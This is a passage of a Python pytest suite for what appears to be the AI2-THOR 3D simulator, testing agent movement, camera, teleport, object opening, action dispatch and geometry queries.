action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
fieldOfView=changeFOV,
position=expectedPosition2,
rotation=expectedRotation2,
)
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == changeFOV
), "fieldOfView should have been updated"
expectedPosition.update(expectedPosition2)
expectedRotation.update(expectedRotation2)
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should been slightly updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should been slightly updated",
)
for fov in [-1, 181, 0]:
e = fifo_controller.step(
dict(
action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
fieldOfView=fov,
)
)
assert not e.metadata[
"lastActionSuccess"
], "fieldOfView should fail outside of (0, 180)"
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should not have updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should not have updated",
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_look(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
e = controller.step(dict(action="RotateLook", rotation=90, horizon=31))
assert e.metadata["agent"]["position"] == position
assert int(e.metadata["agent"]["cameraHorizon"]) == 31
assert e.metadata["agent"]["rotation"]["y"] == 90.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_right(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
e = controller.step(dict(action="RotateRight"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == horizon
assert e.metadata["agent"]["rotation"]["y"] == 90.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_aabb_cache(controller):
objects = controller.last_event.metadata["objects"]
obj = next(obj for obj in objects if obj["objectType"] == "Fridge")
start_aabb = obj["axisAlignedBoundingBox"]
open_event = controller.step(
action="OpenObject",
objectId=obj["objectId"],
forceAction=True,
raise_for_failure=True,
)
obj = next(
obj for obj in open_event.metadata["objects"] if obj["objectType"] == "Fridge"
)
open_aabb = obj["axisAlignedBoundingBox"]
assert start_aabb["size"] != open_aabb["size"]
close_event = controller.step(
action="CloseObject",
objectId=obj["objectId"],
forceAction=True,
raise_for_failure=True,
)
obj = next(
obj for obj in close_event.metadata["objects"] if obj["objectType"] == "Fridge"
)
close_aabb = obj["axisAlignedBoundingBox"]
assert start_aabb["size"] == close_aabb["size"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable_with_filter(controller):
position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
action = position.copy()
action["rotation"] = dict(y=90)
action["horizon"] = 0
action["standing"] = True
action["action"] = "TeleportFull"
controller.step(action, raise_for_failure=True)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
assert_near(controller.last_event.metadata["agent"]["position"], position)
controller.step(dict(action="SetObjectFilter", objectIds=[]))
assert controller.last_event.metadata["objects"] == []
controller.step(
action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
)
controller.step(dict(action="ResetObjectFilter", objectIds=[]))
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable(controller):
position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
action = position.copy()
action["rotation"] = dict(y=90)
action["horizon"] = 0
action["standing"] = True
action["action"] = "TeleportFull"
controller.step(action, raise_for_failure=True)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
assert_near(controller.last_event.metadata["agent"]["position"], position)
event = controller.step(
action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open(controller):
objects = controller.last_event.metadata["objects"]
obj_to_open = next(obj for obj in objects if obj["objectType"] == "Fridge")
# helper that returns obj_to_open from a new event
def get_object(event, object_id):
return next(
obj for obj in event.metadata["objects"] if obj["objectId"] == object_id
)
for openness in [0.5, 0.7, 0]:
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
openness=openness,
forceAction=True,
raise_for_failure=True,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert abs(opened_obj["openness"] - openness) < 1e-3, "Incorrect openness!"
assert opened_obj["isOpen"] == (openness != 0), "isOpen incorrectly reported!"
# test bad openness values
for bad_openness in [-0.5, 1.5]:
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
openness=bad_openness,
forceAction=True,
)
assert not event.metadata[
"lastActionSuccess"
], "0.0 > Openness > 1.0 should fail!"
# test backwards compatibility on moveMagnitude, where moveMagnitude
# is now `openness`, but when moveMagnitude = 0 that corresponds to openness = 1.
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
forceAction=True,
moveMagnitude=0,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert (
abs(opened_obj["openness"] - 1) < 1e-3
), "moveMagnitude=0 must have openness=1"
assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
# another moveMagnitude check
test_openness = 0.65
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
forceAction=True,
moveMagnitude=test_openness,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert (
abs(opened_obj["openness"] - test_openness) < 1e-3
), "moveMagnitude is not working!"
assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
# a CloseObject specific check
event = controller.step(
action="CloseObject", objectId=obj_to_open["objectId"], forceAction=True
)
obj = get_object(event, obj_to_open["objectId"])
assert abs(obj["openness"] - 0) < 1e-3, "CloseObject openness should be 0"
assert not obj["isOpen"], "CloseObject should report isOpen==false!"
def test_action_dispatch(fifo_controller):
controller = fifo_controller
event = controller.step(
dict(action="TestActionDispatchFindAmbiguous"),
typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
)
known_ambig = sorted(
[
"TestActionDispatchSAAmbig",
"TestActionDispatchSAAmbig2",
"ProcessControlCommand",
]
)
assert sorted(event.metadata["actionReturn"]) == known_ambig
skip_reset(fifo_controller)
def test_action_dispatch_find_ambiguous_stochastic(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindAmbiguous"),
typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
)
known_ambig = sorted(
[
"TestActionDispatchSAAmbig",
"TestActionDispatchSAAmbig2",
"ProcessControlCommand",
]
)
assert sorted(event.metadata["actionReturn"]) == known_ambig
skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous2(fifo_controller):
exception_thrown = False
exception_message = None
try:
fifo_controller.step("TestActionDispatchSAAmbig2")
except ValueError as e:
exception_thrown = True
exception_message = str(e)
assert exception_thrown
assert (
"Ambiguous action: TestActionDispatchSAAmbig2 Signature match found in the same class"
== exception_message
)
skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous(fifo_controller):
exception_thrown = False
exception_message = None
try:
fifo_controller.step("TestActionDispatchSAAmbig")
except ValueError as e:
exception_thrown = True
exception_message = str(e)
assert exception_thrown
assert (
exception_message
== "Ambiguous action: TestActionDispatchSAAmbig Mixing a ServerAction method with overloaded methods is not permitted"
)
skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_stochastic(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindConflicts"),
typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
)
known_conflicts = {
"TestActionDispatchConflict": ["param22"],
}
assert event.metadata["actionReturn"] == known_conflicts
skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_physics(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindConflicts"),
typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
)
known_conflicts = {
"TestActionDispatchConflict": ["param22"],
}
assert event.metadata._raw_metadata["actionReturn"] == known_conflicts
skip_reset(fifo_controller)
def test_action_dispatch_missing_args(fifo_controller):
caught_exception = False
try:
event = fifo_controller.step(
dict(action="TestActionDispatchNoop", param6="foo")
)
print(event.metadata["actionReturn"])
except ValueError as e:
caught_exception = True
assert caught_exception
assert fifo_controller.last_event.metadata["errorCode"] == "MissingArguments"
skip_reset(fifo_controller)
def test_action_dispatch_invalid_action(fifo_controller):
caught_exception = False
try:
event = fifo_controller.step(dict(action="TestActionDispatchNoopFoo"))
except ValueError as e:
caught_exception = True
assert caught_exception
assert fifo_controller.last_event.metadata["errorCode"] == "InvalidAction"
skip_reset(fifo_controller)
def test_action_dispatch_empty(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop"))
assert event.metadata["actionReturn"] == "emptyargs"
skip_reset(fifo_controller)
def test_action_disptatch_one_param(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop", param1=True))
assert event.metadata["actionReturn"] == "param1"
skip_reset(fifo_controller)
def test_action_disptatch_two_param(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoop", param1=True, param2=False)
)
assert event.metadata["actionReturn"] == "param1 param2"
skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoop2", param3=True, param4="foobar")
)
assert event.metadata["actionReturn"] == "param3 param4/default foobar"
skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default_empty(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop2", param3=True))
assert event.metadata["actionReturn"] == "param3 param4/default foo"
skip_reset(fifo_controller)
def test_action_disptatch_serveraction_default(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoopServerAction"))
assert event.metadata["actionReturn"] == "serveraction"
skip_reset(fifo_controller)
def test_action_disptatch_serveraction_with_object_id(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoopServerAction", objectId="candle|1|2|3")
)
assert event.metadata["actionReturn"] == "serveraction"
skip_reset(fifo_controller)
def test_action_disptatch_all_default(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoopAllDefault"))
assert event.metadata["actionReturn"] == "alldefault"
skip_reset(fifo_controller)
def test_action_disptatch_some_default(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoopAllDefault2", param12=9.0)
)
assert event.metadata["actionReturn"] == "somedefault"
skip_reset(fifo_controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1.25, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveback(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveBack"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1.75, y=0.900998652))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveleft(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveLeft"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.75, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveright(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveRight"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.25, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_mag(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead", moveMagnitude=0.5), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1, y=0.9009983))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_fail(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead", moveMagnitude=5.0))
assert not controller.last_event.metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_jsonschema_metadata(controller):
event = controller.step(dict(action="Pass"))
with open(os.path.join(TESTS_DATA_DIR, "metadata-schema.json")) as f:
schema = json.loads(f.read())
jsonschema.validate(instance=event.metadata, schema=schema)
skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_arm_jsonschema_metadata(controller):
controller.reset(agentMode="arm")
event = controller.step(action="Pass")
with open(os.path.join(TESTS_DATA_DIR, "arm-metadata-schema.json")) as f:
schema = json.loads(f.read())
jsonschema.validate(instance=event.metadata, schema=schema)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_scenes_in_build(controller):
scenes = set()
for g in glob.glob("unity/Assets/Scenes/*.unity"):
scenes.add(os.path.splitext(os.path.basename(g))[0])
event = controller.step(dict(action="GetScenesInBuild"), raise_for_failure=True)
return_scenes = set(event.metadata["actionReturn"])
# not testing for private scenes
diff = scenes - return_scenes
assert len(diff) == 0, "scenes in build diff: %s" % diff
skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions(controller):
event = controller.step("GetReachablePositions")
assert (
event.metadata["actionReturn"] == event.metadata["reachablePositions"]
), "reachablePositions should map to actionReturn!"
assert len(event.metadata["reachablePositions"]) > 0 and isinstance(
event.metadata["reachablePositions"], list
), "reachablePositions/actionReturn should not be empty after calling GetReachablePositions!"
assert "reachablePositions" not in event.metadata.keys()
event = controller.step("Pass")
try:
event.metadata["reachablePositions"]
assert (
False
), "reachablePositions shouldn't be available without calling action='GetReachablePositions'."
except:
pass
# Test for Issue: 477
def test_change_resolution_image_synthesis(fifo_controller):
fifo_controller.reset(
TEST_SCENE,
width=300,
height=300,
renderInstanceSegmentation=True,
renderDepthImage=True,
renderSemanticSegmentation=True,
)
fifo_controller.step("RotateRight")
first_event = fifo_controller.last_event
first_depth_frame = fifo_controller.last_event.depth_frame
first_instance_frame = fifo_controller.last_event.instance_segmentation_frame
first_sem_frame = fifo_controller.last_event.semantic_segmentation_frame
event = fifo_controller.step(action="ChangeResolution", x=500, y=500)
assert event.depth_frame.shape == (500, 500)
assert event.instance_segmentation_frame.shape == (500, 500, 3)
assert event.semantic_segmentation_frame.shape == (500, 500, 3)
event = fifo_controller.step(action="ChangeResolution", x=300, y=300)
assert event.depth_frame.shape == (300, 300)
assert event.instance_segmentation_frame.shape == (300, 300, 3)
assert event.semantic_segmentation_frame.shape == (300, 300, 3)
assert np.allclose(event.depth_frame, first_depth_frame, atol=0.001)
assert np.array_equal(event.instance_segmentation_frame, first_instance_frame)
assert np.array_equal(event.semantic_segmentation_frame, first_sem_frame)
assert first_event.color_to_object_id == event.color_to_object_id
assert first_event.object_id_to_color == event.object_id_to_color
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_change_resolution(controller):
event = controller.step(dict(action="Pass"), raise_for_failure=True)
assert event.frame.shape == (300, 300, 3)
event = controller.step(
dict(action="ChangeResolution", x=400, y=400), raise_for_failure=True
)
assert event.frame.shape == (400, 400, 3)
assert event.screen_width == 400
assert event.screen_height == 400
event = controller.step(
dict(action="ChangeResolution", x=300, y=300), raise_for_failure=True
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_teleport(controller):
# Checking y coordinate adjustment works
controller.step(
"TeleportFull", **{**BASE_FP28_LOCATION, "y": 0.95}, raise_for_failure=True
)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, BASE_FP28_POSITION)
controller.step(
"TeleportFull",
**{**BASE_FP28_LOCATION, "x": -2.0, "z": -2.5, "y": 0.95},
raise_for_failure=True,
)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-2.0, z=-2.5, y=0.901))
# Teleporting too high
before_position = controller.last_event.metadata["agent"]["position"]
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "y": 1.0},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Teleport should not allow changes for more than 0.05 in the y coordinate."
assert (
controller.last_event.metadata["agent"]["position"] == before_position
), "After failed teleport, the agent's position should not change."
# Teleporting into an object
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "z": -3.5},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Should not be able to teleport into an object."
# Teleporting into a wall
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "z": 0},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Should not be able to teleport into a wall."
# DEFAULT AGENT TEST
# make sure Teleport works with default args
a1 = controller.last_event.metadata["agent"]
a2 = controller.step("Teleport", horizon=10).metadata["agent"]
assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
# all should be the same except for horizon
assert_near(a1["position"], a2["position"])
assert_near(a1["rotation"], a2["rotation"])
assert (
a1["isStanding"] == a2["isStanding"]
), "Agent should remain in same standing when unspecified!"
assert a1["isStanding"] != None, "Agent isStanding should be set for physics agent!"
# make sure float rotation works
# TODO: readd this when it actually works
# agent = controller.step('TeleportFull', rotation=25).metadata['agent']
# assert_near(agent['rotation']['y'], 25)
# test out of bounds with default agent
for action in ["Teleport", "TeleportFull"]:
try:
controller.step(
action="TeleportFull",
position=dict(x=2000, y=0, z=9000),
rotation=dict(x=0, y=90, z=0),
horizon=30,
raise_for_failure=True,
)
assert False, "Out of bounds teleport not caught by physics agent"
except:
pass
# Teleporting with the locobot and drone, which don't support standing
for agent in ["locobot", "drone"]:
event = controller.reset(agentMode=agent)
assert event.metadata["agent"]["isStanding"] is None, agent + " cannot stand!"
# Only degrees of freedom on the locobot
for action in ["Teleport", "TeleportFull"]:
event = controller.step(
action=action,
position=dict(x=-1.5, y=0.9, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=30,
)
assert event.metadata["lastActionSuccess"], (
agent + " must be able to TeleportFull without passing in standing!"
)
try:
event = controller.step(
action=action,
position=dict(x=-1.5, y=0.9, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=30,
standing=True,
)
assert False, (
agent + " should not be able to pass in standing to teleport!"
)
except:
pass
# test out of bounds with default agent
try:
controller.step(
action=action,
position=dict(x=2000, y=0, z=9000),
rotation=dict(x=0, y=90, z=0),
horizon=30,
raise_for_failure=True,
)
assert False, "Out of bounds teleport not caught by physics agent"
except:
pass
# make sure Teleport works with default args
a1 = controller.last_event.metadata["agent"]
a2 = controller.step("Teleport", horizon=10).metadata["agent"]
assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
# all should be the same except for horizon
assert_near(a1["position"], a2["position"])
assert_near(a1["rotation"], a2["rotation"])
# TODO: readd this when it actually works.
# make sure float rotation works
# if agent == "locobot":
# agent = controller.step('TeleportFull', rotation=25).metadata['agent']
# assert_near(agent['rotation']['y'], 25)
controller.reset(agentMode="default")
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_interactable_poses(controller):
fridgeId = next(
obj["objectId"]
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
event = controller.step("GetInteractablePoses", objectId=fridgeId)
poses = event.metadata["actionReturn"]
assert (
600 > len(poses) > 400
), "Should have around 400 interactable poses next to the fridge!"
# teleport to a random pose
pose = poses[len(poses) // 2]
event = controller.step("TeleportFull", **pose)
# assumes 1 fridge in the scene
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
# tests that teleport correctly works with **syntax
assert (
abs(pose["x"] - event.metadata["agent"]["position"]["x"]) < 1e-3
), "Agent x position off!"
assert (
abs(pose["z"] - event.metadata["agent"]["position"]["z"]) < 1e-3
), "Agent z position off!"
assert (
abs(pose["rotation"] - event.metadata["agent"]["rotation"]["y"]) < 1e-3
), "Agent rotation off!"
assert (
abs(pose["horizon"] - event.metadata["agent"]["cameraHorizon"]) < 1e-3
), "Agent horizon off!"
assert (
pose["standing"] == event.metadata["agent"]["isStanding"]
), "Agent's isStanding is off!"
# potato should be inside of the fridge (and, thus, non interactable)
potatoId = next(
obj["objectId"]
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Potato"
)
event = controller.step("GetInteractablePoses", objectId=potatoId)
assert (
len(event.metadata["actionReturn"]) == 0
), "Potato is inside of fridge, and thus, shouldn't be interactable"
assert event.metadata[
"lastActionSuccess"
], "GetInteractablePoses with Potato shouldn't have failed!"
# assertion for maxPoses
event = controller.step("GetInteractablePoses", objectId=fridgeId, maxPoses=50)
assert len(event.metadata["actionReturn"]) == 50, "maxPoses should be capped at 50!"
# assert only checking certain horizons and rotations is working correctly
horizons = [0, 30]
rotations = [0, 45]
event = controller.step(
"GetInteractablePoses",
objectId=fridgeId,
horizons=horizons,
rotations=rotations,
)
for pose in event.metadata["actionReturn"]:
horizon_works = False
for horizon in horizons:
if abs(pose["horizon"] - horizon) < 1e-3:
horizon_works = True
break
assert horizon_works, "Not expecting horizon: " + pose["horizon"]
rotation_works = False
for rotation in rotations:
if abs(pose["rotation"] - rotation) < 1e-3:
rotation_works = True
break
assert rotation_works, "Not expecting rotation: " + pose["rotation"]
# assert only checking certain horizons and rotations is working correctly
event = controller.step("GetInteractablePoses", objectId=fridgeId, rotations=[270])
assert (
len(event.metadata["actionReturn"]) == 0
), "Fridge shouldn't be viewable from this rotation!"
assert event.metadata[
"lastActionSuccess"
], "GetInteractablePoses with Fridge shouldn't have failed!"
# test maxDistance
event = controller.step("GetInteractablePoses", objectId=fridgeId, maxDistance=5)
assert (
1300 > len(event.metadata["actionReturn"]) > 1100
), "GetInteractablePoses with large maxDistance is off!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_2d_semantic_hulls(controller):
from shapely.geometry import Polygon
controller.reset("FloorPlan28")
obj_name_to_obj_id = {
o["name"]: o["objectId"] for o in controller.last_event.metadata["objects"]
}
# Used to save fixed object locations.
# with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "w") as f:
# json.dump(
# [
# {k: o[k] for k in ["name", "position", "rotation"]}
# for o in controller.last_event.metadata["objects"]
# ],
# f
# )
with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "r") as f:
fixed_obj_poses = json.load(f)
for o in fixed_obj_poses:
teleport_success = controller.step(
"TeleportObject",
objectId=obj_name_to_obj_id[o["name"]],
position=o["position"],
rotation=o["rotation"],
forceAction=True,
forceKinematic=True,
makeUnbreakable=True,
).metadata["lastActionSuccess"]
assert teleport_success
object_types = ["Tomato", "Drawer", "Fridge"]
object_ids = [
"Mug|-03.15|+00.82|-03.47",
"Faucet|-00.39|+00.93|-03.61",
"StoveBurner|-00.22|+00.92|-01.85",
]
def get_rounded_hulls(**kwargs):
if "objectId" in kwargs:
md = controller.step("Get2DSemanticHull", **kwargs).metadata
else:
md = controller.step("Get2DSemanticHulls", **kwargs).metadata
assert md["lastActionSuccess"] and md["errorMessage"] == ""
hulls = md["actionReturn"]
if isinstance(hulls, list):
return np.array(hulls, dtype=float).round(4).tolist()
else:
return {
k: np.array(v, dtype=float).round(4).tolist()
for k, v in md["actionReturn"].items()
}
# All objects
hulls_all = get_rounded_hulls()
# Filtering by object types
hulls_type_filtered = get_rounded_hulls(objectTypes=object_types)
# Filtering by object ids
hulls_id_filtered = get_rounded_hulls(objectIds=object_ids)
# Single object id
hulls_single_object = get_rounded_hulls(objectId=object_ids[0])
# Used to save the ground truth values:
# objects = controller.last_event.metadata["objects"]
# objects_poses = [
# {"objectName": o["name"], "position": o["position"], "rotation": o["rotation"]} for o in objects
# ]
# print(controller.step("SetObjectPoses", objectPoses=objects_poses).metadata)
# with open("ai2thor/tests/data/semantic-2d-hulls.json", "w") as f:
# json.dump(
# {
# "all": hulls_all,
# "type_filtered": hulls_type_filtered,
# "id_filtered": hulls_id_filtered,
# "single_object": hulls_single_object,
# },
# f
# )
with open("ai2thor/tests/data/semantic-2d-hulls.json") as f:
truth = json.load(f)
def assert_almost_equal(a, b):
if isinstance(a, list):
pa = Polygon(a)
pb = Polygon(b)
pa_area = pa.area
pb_area = pb.area
sym_diff_area = pa.symmetric_difference(pb).area
# TODO: There seems to be a difference in the geometry reported by Unity when in
# Linux vs Mac. I've had to increase the below check to the relatively generous <0.02
# to get this test to pass.
assert sym_diff_area / max([1e-6, pa_area, pb_area]) < 2e-2, (
f"Polygons have to large an area ({sym_diff_area}) in their symmetric difference"
f" compared to their sizes ({pa_area}, {pb_area}). Hulls:\n"
f"{json.dumps(a)}\n"
f"{json.dumps(b)}\n"
)
else:
for k in set(a.keys()) | set(b.keys()):
try:
assert_almost_equal(a[k], b[k])
except AssertionError as e:
raise AssertionError(f"For {k}: {e.args[0]}")
assert_almost_equal(truth["all"], hulls_all)
assert_almost_equal(truth["type_filtered"], hulls_type_filtered)
assert_almost_equal(truth["id_filtered"], hulls_id_filtered)
assert_almost_equal(truth["single_object"], hulls_single_object)
# Should fail when given types and ids
assert not controller.step(
"Get2DSemanticHulls", objectTypes=object_types, objectIds=object_ids
).metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
@pytest.mark.skip(reason="Colliders need to be moved closer to objects.")
def test_get_object_in_frame(controller):
controller.reset(scene=TEST_SCENE, agentMode="default")
event = controller.step(
action="TeleportFull",
position=dict(x=-1, y=0.900998235, z=-1.25),
rotation=dict(x=0, y=90, z=0),
horizon=0,
standing=True,
)
assert event, "TeleportFull should have succeeded!"
query = controller.step("GetObjectInFrame", x=0.6, y=0.6)
assert not query, "x=0.6, y=0.6 should fail!"
query = controller.step("GetObjectInFrame", x=0.6, y=0.4)
assert query.metadata["actionReturn"].startswith(
"Cabinet"
), "x=0.6, y=0.4 should have a cabinet!"
query = controller.step("GetObjectInFrame", x=0.3, y=0.5)
assert query.metadata["actionReturn"].startswith(
"Fridge"
), "x=0.3, y=0.5 should have a fridge!"
event = controller.reset(renderInstanceSegmentation=True)
assert event.metadata["screenHeight"] == 300
assert event.metadata["screenWidth"] == 300
# exhaustive test
num_tested = 0
for objectId in event.instance_masks.keys():
for obj in event.metadata["objects"]:
if obj["objectId"] == objectId:
break
else:
# object may not be a sim object (e.g., ceiling, floor, wall, etc.)
continue
num_tested += 1
mask = event.instance_masks[objectId]
# subtract 3 pixels off the edge due to pixels being rounded and collider issues
mask = Image.fromarray(mask)
for _ in range(3):
mask_edges = mask.filter(ImageFilter.FIND_EDGES)
mask = ImageChops.subtract(mask, mask_edges)
mask = np.array(mask)
ys, xs = mask.nonzero()
for x, y in zip(xs, ys):
event = controller.step(
action="GetObjectInFrame", x=x / 300, y=y / 300, forceAction=True
)
assert (
event.metadata["actionReturn"] == objectId
), f"Failed at ({x / 300}, {y / 300}) for {objectId} with agent at: {event.metadata["agent"]}"
assert (
num_tested == 29
), "There should be 29 objects in the frame, based on the agent's pose!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_coordinate_from_raycast(controller):
controller.reset(scene="FloorPlan28")
event = controller.step(
action="TeleportFull",
position=dict(x=-1.5, y=0.900998235, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=0,
standing=True,
)
assert event, "TeleportFull should have succeeded!"
for x, y in [(1.5, 0.5), (1.1, 0.3), (-0.1, 0.8), (-0.5, -0.3)]:
query = controller.step("GetCoordinateFromRaycast", x=x, y=y)
assert not query, f"x={x}, y={y} should fail!"
query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.5)
assert_near(
query.metadata["actionReturn"],
{"x": -0.344259053, "y": 1.57599819, "z": -1.49999917},
)
query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.2)
assert_near(
query.metadata["actionReturn"],
{"x": -0.344259053, "y": 2.2694428, "z": -1.49999917},
)
query = controller.step("GetCoordinateFromRaycast", x=0.25, y=0.5)
assert_near(
query.metadata["actionReturn"],
{"x": -0.5968407392501831, "y": 1.5759981870651245, "z": -1.0484200716018677},
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions_with_directions_relative_agent(controller):
controller.reset("FloorPlan28")
event = controller.step("GetReachablePositions")
num_reachable_aligned = len(event.metadata["actionReturn"])
assert 100 < num_reachable_aligned < 125
controller.step(
action="TeleportFull",
position=dict(x=-1, y=0.900998235, z=-1.25),
rotation=dict(x=0, y=49.11111, z=0),
horizon=0,
standing=True,
)
event = controller.step("GetReachablePositions")
num_reachable_aligned_after_teleport = len(event.metadata["actionReturn"])
assert num_reachable_aligned == num_reachable_aligned_after_teleport
event = controller.step("GetReachablePositions", directionsRelativeAgent=True)
num_reachable_unaligned = len(event.metadata["actionReturn"])
assert 100 < num_reachable_unaligned < 125
assert (
num_reachable_unaligned != num_reachable_aligned
), "Number of reachable positions should differ when using `directionsRelativeAgent`"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_move(controller):
event = controller.reset(scene="FloorPlan28", agentMode="arm")
assert_near(
point1={"x": -1.5, "y": 0.9009982347488403, "z": -1.5},
point2=event.metadata["agent"]["position"],
)
